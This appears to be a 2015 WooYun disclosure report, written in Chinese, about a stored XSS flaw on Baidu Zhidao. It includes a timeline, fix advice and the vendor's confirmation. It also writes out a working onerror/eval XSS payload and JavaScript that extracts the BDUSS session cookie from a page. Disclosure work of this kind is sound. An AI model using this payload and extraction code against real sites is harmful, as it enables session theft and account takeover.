漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-099442
漏洞标题:百度某分站XSS可以得到BDUSS
相关厂商:百度
漏洞作者: jsbug
提交时间:2015-03-04 18:21
修复时间:2015-04-18 18:22
公开时间:2015-04-18 18:22
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-04: 细节已通知厂商并且等待厂商处理中
2015-03-05: 厂商已经确认,细节仅向厂商公开
2015-03-15: 细节向核心白帽子及相关领域专家公开
2015-03-25: 细节向普通白帽子公开
2015-04-04: 细节向实习白帽子公开
2015-04-18: 细节向公众公开
简要描述:
管理员审核真勤快,刚发就删除,截图都快来不及了.
详细说明:
真相问答机里存在BDUSS
http://zhidao.baidu.com/liuyan/detail?id=5809
现在就缺个百度知道的XSS了,o——o!
看了下评论,JSON载入,前台页面过滤了。
但是JSON请求返回的是text/html,且没过滤<>
http://zhidao.baidu.com/api/comment?app=article&thread_id=10000005809&method=get_reply&encoding=gbk&start=0&limit=10&r=1425448854170
接下来就简单了。
评论提交:
[code]
<img src=x onerror=eval(location.hash.slice(1))>
[/code]
Ajax获取下BDUSS
[code]
var xmlhttp;
if (window.XMLHttpRequest) {
xmlhttp = new XMLHttpRequest();
} else {
xmlhttp = new ActiveXObject('Microsoft.XMLHTTP');
}
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
var res = xmlhttp.responseText;
var a = res.indexOf('BDUSS');
var b = res.indexOf('"});');
alert(res.substring(a, b));
}
}
xmlhttp.open('GET', '/liuyan/detail?id=5809', true);
xmlhttp.send();
[/code]
漏洞证明:
修复方案:
返回正确的响应头。
过滤。
页面不要出现敏感数据。
版权声明:转载请注明来源 jsbug@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-03-05 11:46
厂商回复:
感谢提交,已通知业务部门处理
最新状态:
暂无